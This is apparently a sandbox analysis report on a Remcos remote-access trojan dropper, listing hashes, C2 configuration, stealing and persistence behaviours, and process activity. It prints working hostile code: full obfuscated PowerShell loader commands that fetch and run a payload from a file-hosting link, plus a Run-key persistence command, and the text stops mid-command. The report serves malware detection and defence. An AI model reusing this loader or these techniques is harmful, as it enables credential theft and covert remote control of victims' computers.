remcos | 20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-11-2024 02:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509.vbs
Size

33KB
MD5

b87c82bba48c44f8fc387ecd6100ff0e
SHA1

2cdcb7b8b4f5a8b0501a121b6b4264aa7c6b2f57
SHA256

20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509
SHA512

442d105706dcc997c39a141d7a944bbb961e8948d15caee81814f1a6d6245e46b00bf98e893c1623bd92b12b1ac440432fd26f4fd9166c5ffea8ac9a575af189
SSDEEP

768:5KSasMUqkx36r142byXNoPNhZqpCtHki2ynMVVX09rkFJC:ISas/RF6hWyPN/MbZ09oFM

Score

10^/10

remcos remotehost collection credential_access discovery evasion persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/1984-89-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/908-77-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4412-76-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/1984-89-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/4412-76-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
2	4916	WScript.exe
8	2900	powershell.exe
12	2900	powershell.exe
25	212	msiexec.exe
27	212	msiexec.exe
29	212	msiexec.exe
31	212	msiexec.exe
34	212	msiexec.exe
49	212	msiexec.exe
50	212	msiexec.exe
51	212	msiexec.exe
52	212	msiexec.exe
54	212	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

Chrome.exeChrome.exemsedge.exemsedge.exeChrome.exeChrome.exemsedge.exemsedge.exemsedge.exe

pid	Process
2800	Chrome.exe
4616	Chrome.exe
4964	msedge.exe
5080	msedge.exe
216	Chrome.exe
2160	Chrome.exe
3172	msedge.exe
3136	msedge.exe
3260	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\\Software\\lestiwarite\\').Generalljtnanten;%Emboldened% ($Melolonthinae)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
7	drive.google.com
8	drive.google.com
25	drive.google.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
212	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
468	powershell.exe
212	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	Process	procid_target
PID 212 set thread context of 4412	212	msiexec.exe	112
PID 212 set thread context of 1984	212	msiexec.exe	114
PID 212 set thread context of 908	212	msiexec.exe	115

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exemsiexec.execmd.exereg.exemsiexec.execmd.exereg.exemsiexec.exemsiexec.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
3556	reg.exe
4972	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exeChrome.exe

pid	Process
2900	powershell.exe
2900	powershell.exe
468	powershell.exe
468	powershell.exe
468	powershell.exe
4412	msiexec.exe
4412	msiexec.exe
908	msiexec.exe
908	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
4412	msiexec.exe
4412	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
2800	Chrome.exe
2800	Chrome.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
468	powershell.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe
212	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid	Process
3172	msedge.exe
3172	msedge.exe
3172	msedge.exe
3172	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	Process
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	908	msiexec.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe
Token: SeShutdownPrivilege	2800	Chrome.exe
Token: SeCreatePagefilePrivilege	2800	Chrome.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Chrome.exemsedge.exe

pid	Process
2800	Chrome.exe
2800	Chrome.exe
3172	msedge.exe
3172	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid	Process
212	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.execmd.exeChrome.exe

description	pid	Process	procid_target
PID 4916 wrote to memory of 2900	4916	WScript.exe	83
PID 4916 wrote to memory of 2900	4916	WScript.exe	83
PID 468 wrote to memory of 212	468	powershell.exe	101
PID 468 wrote to memory of 212	468	powershell.exe	101
PID 468 wrote to memory of 212	468	powershell.exe	101
PID 468 wrote to memory of 212	468	powershell.exe	101
PID 212 wrote to memory of 4868	212	msiexec.exe	102
PID 212 wrote to memory of 4868	212	msiexec.exe	102
PID 212 wrote to memory of 4868	212	msiexec.exe	102
PID 4868 wrote to memory of 3556	4868	cmd.exe	105
PID 4868 wrote to memory of 3556	4868	cmd.exe	105
PID 4868 wrote to memory of 3556	4868	cmd.exe	105
PID 212 wrote to memory of 2288	212	msiexec.exe	109
PID 212 wrote to memory of 2288	212	msiexec.exe	109
PID 212 wrote to memory of 2288	212	msiexec.exe	109
PID 2288 wrote to memory of 4972	2288	cmd.exe	111
PID 2288 wrote to memory of 4972	2288	cmd.exe	111
PID 2288 wrote to memory of 4972	2288	cmd.exe	111
PID 212 wrote to memory of 4412	212	msiexec.exe	112
PID 212 wrote to memory of 4412	212	msiexec.exe	112
PID 212 wrote to memory of 4412	212	msiexec.exe	112
PID 212 wrote to memory of 4412	212	msiexec.exe	112
PID 212 wrote to memory of 3480	212	msiexec.exe	113
PID 212 wrote to memory of 3480	212	msiexec.exe	113
PID 212 wrote to memory of 3480	212	msiexec.exe	113
PID 212 wrote to memory of 1984	212	msiexec.exe	114
PID 212 wrote to memory of 1984	212	msiexec.exe	114
PID 212 wrote to memory of 1984	212	msiexec.exe	114
PID 212 wrote to memory of 1984	212	msiexec.exe	114
PID 212 wrote to memory of 908	212	msiexec.exe	115
PID 212 wrote to memory of 908	212	msiexec.exe	115
PID 212 wrote to memory of 908	212	msiexec.exe	115
PID 212 wrote to memory of 908	212	msiexec.exe	115
PID 212 wrote to memory of 2800	212	msiexec.exe	116
PID 212 wrote to memory of 2800	212	msiexec.exe	116
PID 2800 wrote to memory of 3860	2800	Chrome.exe	117
PID 2800 wrote to memory of 3860	2800	Chrome.exe	117
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119
PID 2800 wrote to memory of 2192	2800	Chrome.exe	119

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn 